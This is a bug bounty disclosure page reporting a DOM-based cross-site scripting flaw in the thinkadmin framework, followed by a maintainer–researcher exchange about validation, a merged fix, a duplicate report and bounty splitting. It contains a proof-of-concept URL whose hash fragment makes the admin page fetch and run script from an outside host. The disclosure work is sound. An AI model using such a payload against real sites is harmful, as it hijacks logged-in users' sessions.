Cross-site Scripting (XSS) - DOM in zoujingli/thinkadmin

Valid

Reported on

Sep 15th 2021


Description

DOM based xss via url hash frgament

Proof of Concept

First login into https://v6.thinkadmin.top and then visit https://v6.thinkadmin.top/admin.html#https://bbounty.000webhostapp.com/cors.php?id=xxxxx2 and see xss is executed

Impact

DOM based xss via url hash fragment

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back 2 months ago
邹景立 has invalidated this vulnerability 2 months ago

The framework design needs to use hash to load page resources and allows the use of JavaScript. Therefore, such problems are inevitable and need to be used.

The disclosure bounty has been dropped
The fix bounty has been dropped
ranjit-git
2 months ago

Researcher


If you want to load hash fragment then only allow server url.
Here you can see I can set any arbitary url and it will fetch data

ranjit-git
2 months ago

Researcher


Here in my poc url you can see it fetches any url. But you need to set url to be fetch from own server

邹景立
2 months ago

Maintainer


I'm very sorry. After careful consideration, I decided to fix this problem, but it has been closed and can't be marked.

ranjit-git
2 months ago

Researcher


@admin . I asking admin to re-open this bug so that you can validate the bug

邹景立
2 months ago

Maintainer


OK, I also suggest the administrator to reopen it!

Jamie Slome
2 months ago

Admin


I have updated the report to pending - feel free to mark it as you please!

邹景立 validated this vulnerability 2 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 confirmed that a fix has been merged on 4469f7 2 months ago
邹景立 has been awarded the fix bounty
0x9x
2 months ago

Nice find !

Jamie Slome
2 months ago

Admin


@maintainer - just jumping in here!

We just want to know if you perceive this report to be a duplicate of:

https://huntr.dev/bounties/5c129785-cf80-4123-b869-3945b386139a/

邹景立
2 months ago

Maintainer


@admin Confirm duplicate report.

0x9x
2 months ago

i confirm the duplicated report , but not the verbose error reported on my original report . So i hope you can accept also my report .

Jamie Slome
2 months ago

Admin


As we are in a unique situation, would both researchers be happy to split the bounty for the disclosure, half/half?